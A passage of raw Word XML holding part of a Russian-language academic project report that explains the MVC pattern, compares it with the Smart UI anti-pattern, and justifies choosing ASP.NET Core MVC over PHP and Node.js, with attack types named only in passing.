        <w:t xml:space="preserve">Контроллеры являются «соединительной тканью» паттерна </w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">, исполняя роль каналов между моделью данных и представлениями. Контроллеры определяют действия, предоставляющие бизнес-логику, которая </w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">оперирует на модели данных и обеспечивает представления данными, подлежащими отображению для пользователя. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C5AFB6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">Представления содержат логику, которая требуется для отображения данных пользователю или для сбора данных от пользователя, так что они могут быть обработаны каким-то действием контроллера. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF29C41" w14:textId="144E4A6E" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">Данный паттерн реализован на платформе </w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve"> 6 [</w:t>
      </w:r>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">], то есть он является кроссплатформенным и реализует библиотеку классов, наследуемую от </w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AspNetCore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00505DD4">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">]. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086139DE" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve"> – не единственный архитектурный паттерн программного обеспечения. Есть много других паттернов, и некоторые из них чрезвычайно популярны или, по крайней мере, были таковыми. Преимущества </w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve"> можно обнаружить, сравнивая его с альтернативами. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F5A6D5" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">Один из наиболее распространенных </w:t>
      </w:r>
      <w:r w:rsidRPr="00837F65">
        <w:t>паттернов</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve"> проектирования известен как «Интеллектуальный пользовательский интерфейс» (</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Smart</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UI</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">). Большинству программистов приходилось создавать приложение с интеллектуальным пользовательским интерфейсом на том или ином этапе своей профессиональной деятельности. При построении приложения с интеллектуальным пользовательским интерфейсом разработчики конструируют интерфейс, часто перетаскивая набор компонентов либо элементов управления на поверхность проектирования или холст. Элементы управления сообщают о взаимодействии с пользователем, инициируя события для щелчков кнопками мыши, нажатий клавиш на клавиатуре, перемещений курсора и т.д. Разработчик добавляет код реакции на такие события в набор обработчиков событий, которые являются небольшими блоками кода, вызываемыми при выдаче специфического события в определенном компоненте. В конечном итоге получается монолитное приложение. Код, который поддерживает пользовательский интерфейс и реализует бизнес-логику, перемешан между собой без какого-либо разделения обязанностей. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0E0129" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r w:rsidRPr="00505DD4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Код, который определяет приемлемые значения для вводимых данных и запрашивает данные или модифицирует, например, расчетный счет пользователя, оказывается размещенным в небольших фрагментах, связанных друг с другом в предполагаемом порядке поступления событий. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474F5C2F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">Интеллектуальные пользовательские интерфейсы идеальны для простых проектов, т.к. позволяют добиться неплохих результатов достаточно быстро (по сравнению с разработкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">, которая требует определенных начальных затрат, прежде чем будут доставлены результаты). Интеллектуальные пользовательские интерфейсы также подходят для построения прототипов пользовательских интерфейсов. Их инструменты визуального конструирования могут оказаться по-настоящему удобными. Когда необходимо обсуждать с заказчиком требования к внешнему виду и потоку пользовательского интерфейса, тогда инструмент интеллектуального пользовательского интерфейса может быть быстрым и удобным способом для генерации и проверки различных идей. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A904C31" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">Самый крупный недостаток интеллектуальных пользовательских интерфейсов связан с тем, что их трудно сопровождать и расширять. Смешивание кода модели предметной области и бизнес-логики с кодом пользовательского интерфейса приводит к дублированию кода, когда один и тот же фрагмент бизнес-логики копируется и вставляется для поддержки вновь добавленного компонента. Нахождение всех дублированных фрагментов и применение к ним исправления может быть непростой задачей. Добавление новой функции может оказаться практически невозможным без нарушения работы каких-то существующих функций. Тестирование приложения с интеллектуальным пользовательским интерфейсом также может быть затруднено. Единственный способ тестирования – эмуляция взаимодействия с пользователем, что является далеким от идеала и трудно реализуемым фундаментом для обеспечения полного покрытия тестами. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC7DAD4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r w:rsidRPr="00505DD4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В мире </w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve"> интеллектуальный пользовательский интерфейс часто называют </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00505DD4">
        <w:t>антипаттерном</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">, т.е. чем-то таким, чего следует избегать любой ценой. Такая антипатия возникает (по крайней мере частично) оттого, что к инфраструктуре </w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve"> обращаются в поисках альтернативы после множества не слишком успешных попыток разработки и сопровождения приложений с интеллектуальным пользовательским интерфейсом, которые попросту вышли из-под контроля. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A22C77D" w14:textId="41553E9F" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r w:rsidRPr="00505DD4">
        <w:t>Тем не менее, полный отказ от паттерна «Интеллектуальный пользовательский интерфейс» будет заблуждением. Далеко не все в нем настолько плохо, и с данным подходом связаны также положительные аспекты. Приложения с интеллектуальным пользовательским интерфейсом быстро и легко разрабатывать. Производители компонентов и инструментов проектирования приложили немало усилий, чтобы сделать процесс разработки приятным занятием, поэтому даже совершенно неопытный программист за считанные часы может получить профессионально выглядящий и достаточно функциональный результат [</w:t>
      </w:r>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">]. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634BE365" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">Наибольшая слабость приложений с интеллектуальным пользовательским интерфейсом – низкое удобство сопровождения – не проявляется при мелких объемах разработки. Если необходимо создать несложный инструмент для небольшой аудитории, то приложение с интеллектуальным пользовательским интерфейсом может оказаться идеальным решением. Просто отсутствует дополнительная сложность, присущая разработке приложения </w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00505DD4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AD0F06" w14:textId="7002B5FF" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r>
        <w:t>Разработку проекта было решено реализовывать с помощью паттерна MVC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330CE1BC" w14:textId="23D42D2E" w:rsidR="00894CEA" w:rsidRDefault="00894CEA" w:rsidP="005924E5">
      <w:r>
        <w:t xml:space="preserve">Мотивация выбора платформы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidRPr="00894CEA">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00894CEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Core</w:t>
      </w:r>
      <w:r w:rsidRPr="00894CEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00894CEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">обусловлена в сравнении с аналогичными технологиями, предоставляющие инструменты для разработки веб-сервиса. Самыми распространёнными на сегодняшний день технологиями для программирования веб-серверов являются </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00894CEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="00776CB4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ode</w:t>
      </w:r>
      <w:r w:rsidR="00776CB4" w:rsidRPr="00776CB4">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00776CB4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00894CEA">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1767C" w14:textId="1FCD92FD" w:rsidR="00A833AB" w:rsidRDefault="00A833AB" w:rsidP="005924E5">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A833AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00A833AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>скриптовый язык программирования, в настоящее время поддерживается большинством хостинг-провайдеров и является одним из лидеров среди языков для программирования интернет-технологий. Распространяется по свободной лицензии «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A833AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>License</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00A833AB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">поэтому его можно использовать как в образовательных целях, так и в коммерческих. Существенным недостатком данного языка является отсутствие в стандартном пакете распространения таких необходимых инструментов для текущего проекта как: создание частичных представлений (технология, позволяющая асинхронно генерировать разметку страницы в ответ на действие пользователя), безопасное обращение к базе данных при реализации принципа внедрения зависимостей (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A833AB">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">коде обращение к базе данных осуществляется за счёт отправки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A833AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>инструкций после действий пользователя, при таком подходе злоумышленник может легко получить несанкционированный доступ к базе данных)</w:t>
      </w:r>
      <w:r w:rsidR="00776CB4">
        <w:t xml:space="preserve">, также </w:t>
      </w:r>
      <w:r w:rsidR="00776CB4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidR="00776CB4">
        <w:t xml:space="preserve">, без использования сторонних пользовательских библиотек, которые не относятся к стандартной поставке языка, уязвим к различным видам хакерским атакам, таким как </w:t>
      </w:r>
      <w:r w:rsidR="00776CB4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00776CB4" w:rsidRPr="00776CB4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00776CB4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00776CB4" w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00776CB4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:r w:rsidR="00776CB4" w:rsidRPr="00776CB4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00776CB4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidR="00776CB4" w:rsidRPr="00776CB4">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00776CB4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Include</w:t>
      </w:r>
      <w:r w:rsidR="00776CB4" w:rsidRPr="00776CB4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF43FFF" w14:textId="43105247" w:rsidR="00776CB4" w:rsidRDefault="00776CB4" w:rsidP="005924E5">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">программная платформа, основанная на движке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t>8 (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">компилирующем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в машинный код</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, превращающая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">из узкоспециализированного языка в язык общего назначения. Традиционно эта платформа используется для создания </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REST</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">приложений, распространяется по лицензии свободного программного обеспечения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MIT</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Платформа </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:t xml:space="preserve">обладает обширной документационной базой и удобным синтаксисом, потому что программирование серверной части и клиентской происходит на одном языке – </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6" w:rsidRPr="000A1EC6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Node</w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6" w:rsidRPr="000A1EC6">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A1EC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A1EC6" w:rsidRPr="000A1EC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:t xml:space="preserve">было решено не использовать в текущем проекте основываясь на том, что </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6" w:rsidRPr="000A1EC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:t xml:space="preserve">является динамически типизируемым языком программирования, что значительно усложняет процесс отладки и расширения архитектуры приложения, также в сравнении с платформой </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6" w:rsidRPr="000A1EC6">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6" w:rsidRPr="000A1EC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6" w:rsidRPr="000A1EC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:t xml:space="preserve">последняя изначально предполагает </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">программирование приложения по паттерну </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6" w:rsidRPr="000A1EC6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:t xml:space="preserve">а не по </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REST</w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6" w:rsidRPr="000A1EC6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:t xml:space="preserve">как это предполагает </w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Node</w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6" w:rsidRPr="000A1EC6">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A1EC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A1EC6" w:rsidRPr="000A1EC6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64314622" w14:textId="5B4C3B43" w:rsidR="00673530" w:rsidRPr="00BC7862" w:rsidRDefault="00673530" w:rsidP="005924E5">
      <w:r>
        <w:t xml:space="preserve">В связи с вышеописанными фактами проект было решено реализовывать на языке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00673530">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00673530">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">использованием технологии </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidRPr="00673530">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00673530">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CORE</w:t>
      </w:r>
      <w:r w:rsidRPr="00673530">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для взаимосвязи кода и базы данных необходимо выбрать технологию, обеспечивающую эту связь. </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entity</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="004C1501">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="004C1501">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Core</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="004C1501">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:t>решает</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="004C1501">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:t>такую</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="004C1501">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:t>задачу</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="004C1501">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entity</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="00FB6623">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="00FB6623">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Core</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="00FB6623">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:t xml:space="preserve">это стандарт компании </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="00FB6623">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:t xml:space="preserve">который обеспечивает прослойку между приложением и базой данных, при обращении к базе данных </w:t>
      </w:r>
      <w:r w:rsidR="00FB6623">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00FB6623" w:rsidRPr="00FB6623">
        <w:t xml:space="preserve"># </w:t>
